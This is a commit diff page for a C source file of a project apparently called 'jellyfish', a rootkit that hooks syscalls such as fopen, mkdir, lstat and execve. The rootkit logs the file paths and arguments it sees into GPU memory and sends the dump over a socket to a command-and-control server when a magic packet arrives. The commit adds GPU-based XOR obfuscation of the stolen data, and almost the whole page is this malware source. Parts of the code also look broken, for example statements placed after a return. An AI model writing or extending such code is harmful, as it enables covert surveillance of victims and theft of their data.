crash.software
Projects
Pull Requests
Issues
Builds
jellyfish
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY jellyfish Commits 9e8a3999
🤬
  • ■ ■ ■ ■ ■
    rootkit/kit.c
    skipped 117 lines
    118 118   }
    119 119  }
    120 120   
    121  -static void send_data(const char *buffer){
     121 +static void send_data(char *buffer){
    122 122   struct sockaddr_in serv_addr;
    123 123   
    124 124   int sock = socket(AF_INET, SOCK_STREAM, 0);
    skipped 18 lines
    143 143   }
    144 144  }
    145 145   
     146 +// gpu syscall xor ex.
    146 147  void jelly_init(){
    147 148   int i;
    148  - 
    149 149   for(i = 0; i < SYSCALL_SIZE; i++){
    150 150   jelly->dev = create_device();
    151 151   jelly->ctx = create_ctx(&jelly->dev);
    skipped 58 lines
    210 210   }
    211 211  }
    212 212   
    213  -static void limit_buf(const char *buffer){
     213 +// gpu syscall xor data ex.
     214 +static char *xor_data(char *buf){
     215 + jelly->dev = create_device();
     216 + jelly->ctx = create_ctx(&jelly->dev);
     217 + jelly->program = build_program(jelly->ctx, jelly->dev, __JELLYXOR__);
     218 + 
     219 + input = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buf, &err);
     220 + local = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err);
     221 + group = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err);
     222 + 
     223 + // device command queue
     224 + jelly->cq = clCreateCommandQueue(jelly->ctx, jelly->dev, 0, &err);
     225 + if(err < 0){
     226 + // queue failed
     227 + }
     228 + 
     229 + // gpu kernel thread
     230 + jelly->kernels[7] = clCreateKernel(jelly->program, jelly_xor, &err);
     231 + if(err < 0){
     232 + // gpu kernel failed
     233 + }
     234 + 
     235 + // gpu kernel args
     236 + err = clSetKernelArg(jelly->kernels[0], 0, sizeof(cl_mem), &log);
     237 + err |= clSetKernelArg(jelly->kernels[0], 1, sizeof(cl_mem), &output);
     238 + err |= clSetKernelArg(jelly->kernels[0], 2, sizeof(cl_mem), &storage);
     239 + if(err < 0){
     240 + // args failed
     241 + }
     242 + 
     243 + // host-device comm
     244 + err = clEnqueueNDRangeKernel(jelly->cq, jelly->kernels[0], 1, NULL, &global_size, &local_size, 0, NULL, NULL);
     245 + if(err < 0){
     246 + // enqueue failed
     247 + }
     248 + 
     249 + // read buf from gpu
     250 + err = clEnqueueReadBuffer(jelly->cq, output, CL_TRUE, 0, sizeof(buffer3), buffer3, 0, NULL, NULL);
     251 + if(err < 0){
     252 + // read buffer failed
     253 + } else{
     254 + return buffer3;
     255 + buffer2 = "";
     256 + buffer = "";
     257 + }
     258 +}
     259 + 
     260 +static void limit_buf(char *buffer){
    214 261   if(sizeof(buffer) >= VRAM_LIMIT){
    215 262   buffer = "Buffer too big for GPU!";
    216 263   }
    skipped 13 lines
    230 277   strcat(buffer, path);
    231 278   limit_buf(buffer);
    232 279   
    233  - log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err);
     280 + // buffer now encrypted
     281 + char *xor_buffer = xor_data(buffer);
     282 + 
     283 + // encrypted gpu storage
     284 + log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err);
    234 285   output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err);
    235 286   storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err);
    236 287   if(err < 0){
    skipped 26 lines
    263 314   // enqueue failed
    264 315   }
    265 316   
    266  - // buffer is now inside gpu
     317 + // encrypted buffer is now inside gpu
    267 318   
    268 319   // if packet from server matches ack-seq keys, dump gpu data, else keep stuffing gpu with more
    269 320   if(correct_packet){
    skipped 1 lines
    271 322   if(err < 0){
    272 323   // gpu buffer read failed
    273 324   }
     325 + // unencrypt from server side later
    274 326   send_data(buffer); // send dumped data via socket to c&c
    275 327   clReleaseMemObject(storage); // reset storage since attacker chose to dump
    276 328   }
    skipped 5 lines
    282 334   
    283 335   // release gpu memory then start over when syscall is called again
    284 336   // we dont release storage object as it will continue to record data to gpu if attacker has not sent magic packet yet
    285  - clReleaseContext(jelly->ctx);
    286  - clReleaseProgram(jelly->program);
    287 337   clReleaseMemObject(log);
    288 338   clReleaseMemObject(output);
    289 339   clReleaseCommandQueue(jelly->cq);
    290 340   clReleaseKernel(jelly->kernels[0]);
     341 + clReleaseContext(jelly->ctx);
     342 + clReleaseProgram(jelly->program);
    291 343   
    292 344   return syscall[SYS_FOPEN].syscall_func(path, mode);
    293 345  }
    skipped 9 lines
    303 355   strcat(buffer, pathname);
    304 356   limit_buf(buffer);
    305 357   
    306  - log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err);
     358 + char *xor_buffer = xor_data(buffer);
     359 + 
     360 + log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err);
    307 361   output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err);
    308 362   storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err);
    309 363   if(err < 0){
    skipped 43 lines
    353 407   buffer2 = "";
    354 408   buffer = "";
    355 409   
    356  - // release gpu memory then start over when syscall is called again
    357  - clReleaseContext(jelly->ctx);
    358  - clReleaseProgram(jelly->program);
    359 410   clReleaseMemObject(log);
    360 411   clReleaseMemObject(output);
    361 412   clReleaseCommandQueue(jelly->cq);
    362 413   clReleaseKernel(jelly->kernels[1]);
     414 + clReleaseContext(jelly->ctx);
     415 + clReleaseProgram(jelly->program);
    363 416   
    364 417   return syscall[SYS_MKDIR].syscall_func(dfd, pathname, mode);
    365 418  }
    skipped 9 lines
    375 428   strcat(buffer, filename);
    376 429   limit_buf(buffer);
    377 430   
    378  - log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err);
     431 + char *xor_buffer = xor_data(buffer);
     432 + 
     433 + log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err);
    379 434   output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err);
    380 435   storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err);
    381 436   if(err < 0){
    skipped 44 lines
    426 481   buffer = "";
    427 482   
    428 483   // release gpu memory then start over when syscall is called again
    429  - clReleaseContext(jelly->ctx);
    430  - clReleaseProgram(jelly->program);
     484 + // we dont release storage object as it will continue to record data to gpu if attacker has not sent magic packet yet
    431 485   clReleaseMemObject(log);
    432 486   clReleaseMemObject(output);
    433 487   clReleaseCommandQueue(jelly->cq);
    434 488   clReleaseKernel(jelly->kernels[2]);
     489 + clReleaseContext(jelly->ctx);
     490 + clReleaseProgram(jelly->program);
    435 491   
    436 492   return syscall[SYS_LSTAT].syscall_func(filename, buf);
    437 493  }
    skipped 9 lines
    447 503   strcat(buffer, filename);
    448 504   limit_buf(buffer);
    449 505   
    450  - log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err);
     506 + char *xor_buffer = xor_data(buffer);
     507 + 
     508 + log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err);
    451 509   output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err);
    452 510   storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err);
    453 511   if(err < 0){
    skipped 65 lines
    519 577   strcat(buffer, pathname);
    520 578   limit_buf(buffer);
    521 579   
    522  - log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err);
     580 + char *xor_buffer = xor_data(buffer);
     581 + 
     582 + log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err);
    523 583   output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err);
    524 584   storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err);
    525 585   if(err < 0){
    skipped 65 lines
    591 651   strcat(buffer, filename);
    592 652   limit_buf(buffer);
    593 653   
    594  - log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err);
     654 + char *xor_buffer = xor_data(buffer);
     655 + 
     656 + log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err);
    595 657   output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err);
    596 658   storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err);
    597 659   if(err < 0){
    skipped 44 lines
    642 704   buffer = "";
    643 705   
    644 706   // release gpu memory then start over when syscall is called again
    645  - clReleaseContext(jelly->ctx);
    646  - clReleaseProgram(jelly->program);
     707 + // we dont release storage object as it will continue to record data to gpu if attacker has not sent magic packet yet
    647 708   clReleaseMemObject(log);
    648 709   clReleaseMemObject(output);
    649 710   clReleaseCommandQueue(jelly->cq);
    650 711   clReleaseKernel(jelly->kernels[5]);
     712 + clReleaseContext(jelly->ctx);
     713 + clReleaseProgram(jelly->program);
    651 714   
    652 715   return syscall[SYS_EXECVE].syscall_func(filename, argv, envp);
    653 716  }
    skipped 9 lines
    663 726   strcat(buffer, pathname);
    664 727   limit_buf(buffer);
    665 728   
    666  - log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer, &err);
     729 + char *xor_buffer = xor_data(buffer);
     730 + 
     731 + log = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), xor_buffer, &err);
    667 732   output = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer2, &err);
    668 733   storage = clCreateBuffer(jelly->ctx, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, VRAM_LIMIT * sizeof(char), buffer3, &err);
    669 734   if(err < 0){
    skipped 63 lines
Please wait...
Page is in error, reload to recover